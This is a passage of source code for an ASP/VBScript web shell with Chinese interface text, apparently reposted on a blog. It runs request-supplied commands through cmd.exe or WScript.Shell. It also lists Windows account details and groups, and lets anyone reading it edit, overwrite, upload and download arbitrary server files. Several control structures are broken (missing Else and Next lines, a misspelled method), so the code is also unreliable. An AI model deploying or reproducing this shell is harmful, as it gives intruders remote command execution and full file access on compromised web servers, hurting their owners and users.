        echo "帐号过期时间: " & User.AccountExpirationDate & "<br/>"
        echo "帐号失败登录次数: " & User.BadLoginCount & "<br/>"
        echo "帐号最后登录时间: " & User.LastLogin & "<br/>"
        echo "帐号最后注销时间: " & User.LastLogoff & "<br/>"
        For Each RegTime In User.LoginHours
          If RegTime < 255 Then
            Restrict = True
          End If
        echo "帐号已用时间: " & Restrict & "<br/>"
      End Sub
      Function getItsGroup(strUser)
        Dim objUser, objGroup
        Set objUser = GetObject("WinNT://./" & strUser & ",user")
        For Each objGroup in objUser.Groups
          getItsGroup = getItsGroup & " " & objGroup.Name
      End Function

      Sub PageWsCmdRun()
        Dim cmdStr, cmdPath, cmdResult
        cmdStr = Request("cmdStr")
        cmdPath = Request("cmdPath")
        If cmdPath = "" Then
          cmdPath = "cmd.exe"
        End If
        If cmdStr <> "" Then
          If InStr(LCase(cmdPath), "cmd.exe") > 0 Or InStr(LCase(cmdPath), LCase(myCmdDotExeFile)) > 0 Then
            cmdResult = doWsCmdRun(cmdPath & " /c " & cmdStr)
             If LCase(cmdPath) = "wscriptshell" Then
              cmdResult = doWsCmdRun(cmdStr)
              cmdResult = doWsCmdRun(cmdPath & " " & cmdStr)
            End If
          End If
        End If
        echo "<style>body{ margin:8; }</style>"
        echo "<body onload=""document.forms[0].cmdStr.focus();document.forms[0].cmdResult.style.height=document.body.clientHeight-115;"">"
        echo "<form method=post onSubmit='this.Submit.disabled=true'>"
        echo "路径: <input name=cmdPath type=text id=cmdPath value=""" & HtmlEncode(cmdPath) & """ size=50> "
        echo "<input type=button name=Submit2 value=使用WScript.Shell onClick=""this.form.cmdPath.value='WScriptShell';""><br/>"
        echo "命令/参数: <input name=cmdStr type=text id=cmdStr value=""" & HtmlEncode(cmdStr) & """ size=62> "
        echo "<input type=submit name=Submit value=' 运行 '><br/>"
        echo "<hr/>注: 请只在这里执行单步程序(程序执行开始到结束不需要人工干预),不然本程序会无法正常工作,并且在服务器生成一个不可结束的进程.<hr/>"
        echo "<textarea id=cmdResult style='100%;height:78%;'>"
        echo HtmlEncode(cmdResult)
        echo "</textarea>"
        echo "</form>"
        echo "</body>"
      End Sub
      Function doWsCmdRun(cmdStr)
        If isDebugMode = False Then
          On Error Resume Next
        End If
        Dim fso, theFile
        Set fso = Server.CreateObject("Scripting.FileSystemObject")
        doWsCmdRun = wsX.Exec(cmdStr).StdOut.ReadAll()
        If Err Then
          echo Err.Description & "<br>"
          wsX.Run cmdStr & " > " & aspPath, 0, True
          Set theFile = fso.OpenTextFile(aspPath)
          doWsCmdRun = theFile.RealAll()
          If Err Then
            echo Err.Description & "<br>"
            doWsCmdRun = streamLoadFromFile(aspPath)
          End If
        End If
        Set fso = Nothing
      End Function

      Sub PageOther()
        echo "<style>" & vbNewLine
        echo "A:visited { color: #333333;text-decoration: none; }" & vbNewLine
        echo "A:active { color: #333333;text-decoration: none; }" & vbNewLine
        echo "A:link { color: #000000;text-decoration: none; }" & vbNewLine
        echo "A:hover { color: #333333;text-decoration: none; }" & vbNewLine
        echo "BODY { font-size: 9pt;COLOR: #000000;font-family: ""Courier New"";border: none;background-color: buttonface; }" & vbNewLine
        echo "textarea { font-family: ""Courier New"";font-size: 12px;border- 1px;color: #000000; }" & vbNewLine
        echo "table { font-size: 9pt; }" & vbNewLine
        echo "form { margin: 0; }" & vbNewLine
        echo "#fsoDriveList span{ 100px; }" & vbNewLine
        echo "#FileList span{ 90;height: 70;cursor: hand;text-align: center;word-break: break-all;border: 1px solid buttonface; }" & vbNewLine
        echo ".anotherSpan{ color: #ffffff; 90;height: 70;text-align: center;background-color: #0A246A;border: 1px solid #0A246A; }" & vbNewLine
        echo ".font{ font-size: 35px;line-height: 40px; }" & vbNewLine
        echo "#fileExplorerTools { background-color: buttonFace; }" & vbNewLine
        echo ".input, input { border- 1px; }" & vbNewLine
        echo "</style>" & vbNewLine
        echo "<script language=javascript>" & vbNewLine
        echo "function showHideMe(me){ " & vbNewLine
        echo "if(me.innerText == ''){ " & vbNewLine
        echo "me.innerText = '\nNo Contents!';" & vbNewLine
        echo " }" & vbNewLine
        echo "if(me.style.display == 'none'){ " & vbNewLine
        echo "me.style.display = '';" & vbNewLine
        echo " }else{ " & vbNewLine
        echo "me.style.display = 'none';" & vbNewLine
        echo " }" & vbNewLine
        echo " }" & vbNewLine
        echo "function changeMyClass(me){ " & vbNewLine
        echo "if(me.className == ''){ " & vbNewLine
        echo "if(usePath.value != '')document.getElementById(usePath.value).className = '';" & vbNewLine
        echo "usePath.value = me.id;" & vbNewLine
        echo "status = me.title;" & vbNewLine
        echo "me.className = 'anotherSpan';" & vbNewLine
        echo " }" & vbNewLine
        echo " }" & vbNewLine
        echo "function changeThePath(me){ " & vbNewLine
        echo "location.href = '?pageName=' + pageName.value + '&thePath=' + me.id;" & vbNewLine
        echo " }" & vbNewLine
        echo "function fixTheLayer(strObj){ " & vbNewLine
        echo "var objStyle=document.getElementById(strObj).style;" & vbNewLine
        echo "objStyle.width = document.body.clientWidth;" & vbNewLine
        echo "objStyle.top = document.body.scrollTop + 2;" & vbNewLine
        echo " }" & vbNewLine
        echo "function openUrl(){ " & vbNewLine
        echo "newWin = window.open('?pageName=' + pageName.value + '&theAct=openUrl&thePath=' + usePath.value);" & vbNewLine
        echo " }" & vbNewLine
        echo "function newOne(){ " & vbNewLine
        echo "newWin = window.open('?pageName=' + pageName.value + '&theAct=newOne&thePath=' + truePath.value, '', 'menu=no,resizable=yes,height=110,width=300');" & vbNewLine
        echo " }" & vbNewLine
        echo "function editFile(){ " & vbNewLine
        echo "newWin = window.open('?pageName=' + pageName.value + '&theAct=showEdit&thePath=' + usePath.value, '', 'menu=no,resizable=yes');" & vbNewLine
        echo " }" & vbNewLine
        echo "function appDoAction(act){ " & vbNewLine
        echo "newWin = window.open('?pageName=' + pageName.value + '&theAct=' + act + '&thePath=' + usePath.value, '', 'menu=no,resizable=yes,height=100,width=368');" & vbNewLine
        echo " }" & vbNewLine
        echo "function downTheFile(){ " & vbNewLine
        echo "if(confirm('如果该文件超过20M,\n建议不要通过流方式下载\n这样会占用服务器大量的资源\n并可能导致服务器死机!\n您可以先把文件复制到当前站点目录下,\n然后通过http协议来下载.\n按\""确定\""用流来进行下载.')){ " & vbNewLine
        echo "newWin = window.open('?pageName=' + pageName.value + '&theAct=downTheFile&thePath=' + usePath.value, '', 'menu=no,resizable=yes,height=100,width=368');" & vbNewLine
        echo " }" & vbNewLine
        echo " }" & vbNewLine
        echo "function appDoAction2(act){ " & vbNewLine
        echo "newWin = window.open('?pageName=' + pageName.value + '&theAct=' + act + '&thePath=' + truePath.value, '','menu=no,resizable=yes,height=100,width=368');" & vbNewLine
        echo " }" & vbNewLine
        echo "function appTheAttributes(){ " & vbNewLine
        echo "newWin = window.open('?pageName=' + pageName.value + '&theAct=theAttributes&thePath=' + usePath.value, '', 'menu=no,resizable=yes,height=194,width=368');" & vbNewLine
        echo " }" & vbNewLine
        echo "function appRename(){ " & vbNewLine
        echo "newWin = window.open('?pageName=' + pageName.value + '&theAct=rename&thePath=' + usePath.value, '', 'menu=no,resizable=yes,height=100,width=368');" & vbNewLine
        echo " }" & vbNewLine
        echo "function upTheFile(){ " & vbNewLine
        echo "newWin = window.open('?pageName=' + pageName.value + '&theAct=showUpload&thePath=' + truePath.value, '', 'menu=no,resizable=yes,height=80,width=380');" & vbNewLine
        echo " }" & vbNewLine
        echo "function wsLoadIFrame(){ " & vbNewLine
        echo "cmdResult.location.href = '?pageName=SaCmdRun&theAct=readResult';" & vbNewLine
        echo " }" & vbNewLine
        echo "function fsoRename(){ " & vbNewLine
        echo "newWin = window.open('?pageName=' + pageName.value + '&theAct=showFsoRename&thePath=' + usePath.value, '', 'menu=no,resizable=yes,height=20,width=300');" & vbNewLine
        echo " }" & vbNewLine
        echo "function delOne(){ " & vbNewLine
        echo "newWin = window.open('?pageName=' + pageName.value + '&theAct=delOne&thePath=' + usePath.value, '', 'menu=no,resizable=yes,height=100,width=368');" & vbNewLine
        echo " }" & vbNewLine
        echo "function fsoGetAttributes(){ " & vbNewLine
        echo "newWin = window.open('?pageName=' + pageName.value + '&theAct=getAttributes&thePath=' + usePath.value, '', 'menu=no,resizable=yes,height=170,width=300');" & vbNewLine
        echo " }" & vbNewLine
        echo "</script>"
      End Sub

      Sub openUrl(usePath)
        Dim theUrl, thePath
        thePath = Server.MapPath("/")
        If LCase(Left(usePath, Len(thePath))) = LCase(thePath) Then
          theUrl = Mid(usePath, Len(thePath) + 1)
          theUrl = Replace(theUrl, "\", "/")
          If Left(theUrl, 1) = "/" Then
            theUrl = Mid(theUrl, 2)
          End If
          Response.Redirect("/" & theUrl)
        End If
      End Sub
      Sub showEdit(thePath, strMethod)
        If isDebugMode = False Then
          On Error Resume Next
        End If
        Dim theFile, unEditableExt
        If Right(thePath, 1) = "\" Then
        End If
        unEditableExt = "$exe$dll$bmp$wav$mp3$wma$ra$wmv$ram$rm$avi$mgp$png$tiff$gif$pcx$jpg$com$msi$scr$rar$zip$ocx$sys$mdb$"
        echo "<style>body{ border:none;overflow:hidden;background-color:buttonface; }</style>"
        echo "<body topmargin=9>"
        echo "<form method=post style='margin:0;100%;height:100%;'>"
        echo "<textarea name=fileContent style='100%;height:90%;'>"
        If strMethod = "stream" Then
          echo HtmlEncode(streamLoadFromFile(thePath))
          Set theFile = fsoX.OpenTextFile(thePath, 1)
          echo HtmlEncode(theFile.ReadAll())
          Set theFile = Nothing
        End If
        echo "</textarea><hr/>"
        echo "<div align=right>"
        echo "保存为:<input size=30 name=thePath value=""" & HtmlEncode(thePath) & """> "
        echo "<input type=checkbox name='windowStatus' id=windowStatus"
        If Request.Cookies(m & "windowStatus") = "True" Then
          echo " checked"
        End If
        echo "><label for=windowStatus>保存后关闭窗口</label> "
        echo "<input type=submit value=' 保存 '><input type=hidden value='saveFile' name=theAct>"
        echo "<input type=reset value=' 恢复 '>"
        echo "<input type=button value=' 清空 ' onclick=this.form.fileContent.innerText='';>"
        echo strJsCloseMe & "</div>"
        echo "</form>"
        echo "</body><br/>"
      End Sub
      Sub saveToFile(thePath, strMethod)
        If isDebugMode = False Then
          On Error Resume Next
        End If
        Dim fileContent, windowStatus
        fileContent = Request("fileContent")
        windowStatus = Request("windowStatus")
        If strMethod = "stream" Then
          streamSaveToFile thePath, fileContent
          fsoSaveToFile thePath, fileContent
        End If
        If windowStatus = "on" Then
          Response.Cookies(m & "windowStatus") = "True"
          Response.Write "<script>window.close();</script>"
          Response.Cookies(m & "windowStatus") = "False"
          Call showEdit(thePath, strMethod)
        End If
      End Sub
      Sub fsoSaveToFile(thePath, fileContent)
        Dim theFile
        Set theFile = fsoX.OpenTextFile(thePath, 2, True)
        theFile.Write fileContent
        Set theFile = Nothing
      End Sub
      Function streamLoadFromFile(thePath)
        Dim stream
        If isDebugMode = False Then
          On Error Resume Next
        End If
        Set stream = Server.CreateObject("adodb.stream")
        With stream
          .LoadFromFile thePath
          .LoadFromFile thePath
          If Request("pageName") <> "TxtSearcher" Then
          End If
        End With
        Set stream = Nothing
      End Function
      Sub downTheFile(thePath)
        If isDebugMode = False Then
          On Error Resume Next
        End If
        Dim stream, fileName, fileContentType

        fileName = split(thePath,"\")(uBound(split(thePath,"\")))
        Set stream = Server.CreateObject("adodb.stream")
        stream.Type = 1
        Response.AddHeader "Content-Disposition", "attachment; filename=" & fileName
        Response.AddHeader "Content-Length", stream.Size
        Response.Charset = "UTF-8"
        Response.ContentType = "application/octet-stream"
        Response.BinaryWrite stream.Read
        Set stream = Nothing
      End Sub
      Sub showUpload(thePath, pageName)
        echo "<style>body{ margin:8;overflow:hidden; }</style>"
        echo "<form method=post enctype='multipart/form-data' action='?pageName=" & pageName & "&theAct=upload&thePath=" & UrlEncode(thePath) & "' onsubmit='this.Submit.disabled=true;;'>"
        echo "上传文件: <input name=file type=file size=31><br/>保存为: "
        echo "<input name=fileName type=text value=""" & HtmlEncode(thePath) & """ size=33>"
        echo "<input type=checkbox name=writeMode value=True>覆盖模式<hr/>"
        echo "<input name=Submit type=submit id=Submit value='上 传' onClick=""this.form.action+='&fileName='+this.form.fileName.value+'&theFile='+this.form.file.value+'&overWrite='+this.form.writeMode.checked;"">"
        echo strJsCloseMe
        echo "</form>"
      End Sub
      Sub streamUpload(thePath)
        If isDebugMode = False Then
          On Error Resume Next
        End If
        Server.ScriptTimeOut = 5000
        Dim i, j, info, stream, streamT, theFile, fileName, overWrite, fileContent
        theFile = Request("theFile")
        fileName = Request("fileName")
        overWrite = Request("overWrite")

        If InStr(fileName, ":") <= 0 Then
          fileName = thePath & fileName
        End If

        Set stream = Server.CreateObject("adodb.stream")
        Set streamT = Server.CreateObject("adodb.stream")

        With stream
          .Type = 1
          .Mode = 3
          .Write Request.BinaryRead(Request.TotalBytes)
          .Position = 0
          fileContent = .Read()
          i = InStrB(fileContent, chrB(13) & chrB(10))
          info = LeftB(fileContent, i - 1)
          i = Len(info) + 2
          i = InStrB(i, fileContent, chrB(13) & chrB(10) & chrB(13) & chrB(10)) + 4 - 1
          j = InStrB(i, fileContent, info) - 1
          streamT.Type = 1
          streamT.Mode = 3
          stream.position = i
          .CopyTo streamT, j - i - 2
          If overWrite = "true" Then
            streamT.SaveToFile fileName, 2
            streamT.SaveToFile fileName
          End If
          If Err.Number = 3004 Then
            fileName = fileName & "\" & Split(theFile, "\")(UBound(Split(theFile ,"\")))
            If overWrite="true" Then
              streamT.SaveToFile fileName, 2
              streamT.SaveToFile fileName
            End If
          End If
          echo("<script language=""javascript"">alert('文件上传成功!\n" & Replace(fileName, "\", "\\") & "');</script>")
        End With
        Set stream = Nothing
        Set streamT = Nothing
      End Sub

      Function getDriveType(num)
        Select Case num
          Case 0
            getDriveType = "未知"
          Case 1
            getDriveType = "可移动磁盘"
          Case 2
            getDriveType = "本地硬盘"
          Case 3
            getDriveType = "网络磁盘"
          Case 4
            getDriveType = "CD-ROM"
          Case 5
            getDriveType = "RAM 磁盘"
        End Select
      End Function

      Function getFileIcon(extName)
        Select Case LCase(extName)
          Case "vbs", "h", "c", "cfg", "pas", "bas", "log", "asp", "txt", "php", "ini", "inc", "htm", "html", "xml", "conf", "config", "jsp", "java", "htt", "lst", "aspx", "php3", "php4", "js", "css", "asa"
            getFileIcon = "Wingdings>2"
          Case "wav", "mp3", "wma", "ra", "wmv", "ram", "rm", "avi", "mpg"
            getFileIcon = "Webdings>·"
          Case "jpg", "bmp", "png", "tiff", "gif", "pcx", "tif"
            getFileIcon = "'webdings'>?"
          Case "exe", "com", "bat", "cmd", "scr", "msi"
            getFileIcon = "Webdings>1"
          Case "sys", "dll", "ocx"
            getFileIcon = "Wingdings>?"
          Case Else
            getFileIcon = "'Wingdings 2'>/"
        End Select
      End Function

      Function getStartType(num)
        Select Case num
          Case 2
            getStartType = "自动"
          Case 3
            getStartType = "手动"
          Case 4
            getStartType = "已禁用"
        End Select
      End Function

      Sub ReloadParentPage()
     echo "<SCRIPT>opener.window.location.reload();</SCRIPT>"
      End Sub
    echo "<body>" & vbNewLine
    echo "</html>" %>

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    Windows 8的本地化应用程序清单
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    mybatis plus eq and or
  • 原文地址:https://www.cnblogs.com/winner/p/357106.html
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